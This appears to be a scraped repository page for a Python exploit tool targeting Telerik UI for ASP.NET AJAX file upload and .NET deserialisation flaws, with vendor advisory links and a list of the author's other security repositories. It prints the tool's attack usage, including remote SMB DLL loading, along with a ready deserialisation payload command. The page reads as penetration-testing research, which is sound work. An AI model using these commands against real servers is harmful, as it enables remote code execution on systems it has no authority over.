• Stars
    star
    166
  • Rank 227,748 (Top 5 %)
  • Language
    Python
  • License
    Apache License 2.0
  • Created almost 7 years ago
  • Updated about 4 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Telerik UI for ASP.NET AJAX File upload and .NET deserialisation exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)

RAU_crypto

Language

Combined exploit for Telerik UI for ASP.NET AJAX.

  • File upload for CVE-2017-11317 and CVE-2017-11357 - will automatically upload the file
  • .NET deserialisation for CVE-2019-18935

Now supports testing for the target's ability to pull in remote payloads from an attacker-hosted SMB service. Use Burp Collaborator and/or Responder to facilitate testing whether the necessary pre-requisites are in place.

For exploitation to work, you generally need a version with hard coded keys, or you need to know the key, for example if you can disclose the contents of web.config. The exploit also allows for straightforward decryption and encryption of the rauPostData used with Telerik.Web.UI.WebResource.axd?type=rau

Requirements

Published on exploit-db (old version)

See also

My other Telerik UI exploit (for CVE-2017-9248) will probably also be of interest. It is available here:

To do

  • Missing HMAC functionality for later versions.
  • Ability to specify custom key.
  • Command line argument for execution of a mixed mode dll (in the meantime use the example .NET deserialisation payload provided below).
  • Command line arguments for testing capability of and loading remotely (SMB) hosted mixed mode dlls
  • Separate utility for testing mixed mode dll.
  • Provide source code/compilation instructions for mixed mode dll.
  • Brute force versions.

Note - the last four items are complete but not released.

Vulnerabilities

The file upload (CVE-2017-11317) vulnerability was discovered by others, I believe credits due to @straight_blast @pwntester @olekmirosh . Shortly after it was announced, I encountered the Telerik library during the course of my work, so I researched it and the vulnerability and wrote this exploit in July 2017. I also reported CVE-2017-11357 for the related insecure direct object reference.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

The .NET deserialisation (CVE-2019-18935) vulnerability was discovered by @mwulftange.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

Usage

$ ./RAU_crypto.py -h

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Check remote SMB payload capability -r lhost url [proxy]

Load remote SMB dll payload         -R lhost/share/mixed_mode_assembly.dll url [proxy]\n\n" +
Trigger local uploaded dll payload  -L c:/users/public/documents/mixed_mode_assembly.dll url [proxy]\n\n" +

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version:           2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS

$

Example - decryption

Decrypt screenshot

Example - arbitrary file uplaod

Upload screenshot

Custom payload (.NET deserialisation)

For details on custom payloads for .NET deserialisation, there is a great article by @mwulftange who discovered this vulnerability on the Code White blog at the following link.

Update - There is an alternative exploit by Caleb Gross @noperator, which incorporates features from this exploit, with a great blog article explaining everything. Thanks also to Caleb for contributing to RAU_Crypto.

Other relevant links.

Example .NET deserialisation payload:

$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

For mixed Mode DLL, see my other github repo:

Special thanks to @irsdl who inspired the custom payload feature.

Credit to @rwincey who inspired the remote dll feature.

More Repositories

1

dp_crypto

Base64-based encryption oracle exploit for CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler)
Python
164
star
2

target-redirector

Target Redirector is a Burp Suite Extension written in Kotlin, which redirects all Burp requests destined for a chosen target to a different target of your choice. The hostname/IP, port and protocol (HTTP/HTTPS) can all be configured to an alternative destination.
Kotlin
23
star
3

bmc_bladelogic

BMC Bladelogic RSCD exploits including remote code execution - CVE-2016-1542, CVE-2016-1543, CVE-2016-5063
Python
19
star
4

HexyRunner

Takes raw hex shellcode (e.g. msfvenom hex format) from a cmd line arg, text file, or URL download and runs it.
C#
18
star
5

waf-cookie-fetcher

WAF Cookie Fetcher is a Burp Suite extension written in Python, which uses a headless browser to obtain the values of WAF-injected cookies which are calculated in the browser by client-side JavaScript code and adds them to Burp's cookie jar. Requires PhantomJS.
Python
16
star
6

dell-emc_recoverpoint

Exploits for Dell EMC RecoverPoint enterprise data protection platform
13
star
7

MixedUp

Mixed Mode Assembly PoC with sample payloads in DLLMain
C++
11
star
8

burp-extender-api-kotlin

Burp Extender API - Unofficial Kotlin version
Kotlin
10
star
9

nf_conntrack-for-scanners

Alters the nf_conntrack settings profile to make it suitable for scanners such as nmap, nessus, etc
Shell
8
star
10

smooth-drop-shadow

Copies images, adding a smooth drop shadow, with enlargement to accommodate. Requires GIMP.
Shell
8
star
11

PortRanger

Converts an unordered (e.g. grepped) network ports to a condensed range/list that is suitable for nmap and other tools.
Shell
6
star
12

redacterm

Edit terminal output ready for screenshots - highlight key areas and redact sensitive info.
Shell
5
star
13

BurpelFish

BurpelFish - Adds Google Translate to Burp's Context Menu. "Babel Fish" language translation for app-sec testing in other languages.
Python
5
star
14

mx-direct-mail-sender

Sends a direct email, with no relay required, by looking up the MX record and delivering the message to one of the resulting mail servers.
Python
3
star
15

picelf

Embed shellcode directly into a minimally sized ELF file
Shell
1
star